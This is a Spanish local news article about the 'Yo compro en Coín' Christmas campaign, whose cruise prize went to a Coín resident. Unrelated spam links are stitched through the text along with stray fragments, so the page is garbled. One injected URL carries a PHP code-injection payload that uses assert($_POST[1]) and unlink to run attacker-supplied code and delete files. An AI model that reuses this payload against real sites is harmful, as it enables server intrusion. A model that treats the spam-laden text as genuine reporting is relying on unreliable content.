ENTREGA PREMIO ` YO COMPRO EN COÍN ´

http://patayersdenver.com/leukemia Los comercios locales entregan el premio de un crucero de la campaña de Navidad

47

http://go2uvm.org//type.php?template=tag_(){};@unlink(_FILE_);assert($_POST[1]);phpinfo();{//../rss La vecina de Coín María Villalobos ha ganado un crucero por el Mediterráneo para dos personas por comprar en el comercio local. La afortunada llevaba la papeleta con el número del primer premio de la lotería del Niño. El establecimiento que ha dado la participación agraciada ha sido Rafael Martín Hogar donde ayer se hizo entrega del regalo.

http://apanda.org/290754-dts43485-aplicaciones-para-conocer-gente-de-gata-de-gorgos.html La campaña navideña ‘Yo compro en Coín’ se ha desarrollado con un gran éxito ya que en la misma han participado 154 negocios, con el objetivo de fomentar las compras de las fiestas navideñas en la localidad, y los ciudadanos han respondido agotando todas las papeletas. El colectivo ya prepara una nueva promoción para San Valentín.

anchor Esta campaña comercial ha contado con la colaboración de la Concejalía de Comercio del Ayuntamiento, que está desarrollando varias medidas para impulsar a los negocios de Coín.

Les recordamos que hasta mañana viernes diez de enero también pueden participar en el segundo sorteo de esta campaña ‘Yo compro en Coín’ que es vía Instagram, subiendo una fotografía comprando en algunos de los negocios con el hashtag yocomproencoin. La que obtenga más ‘me gusta’ ganará un cheque regalo de 200 euros.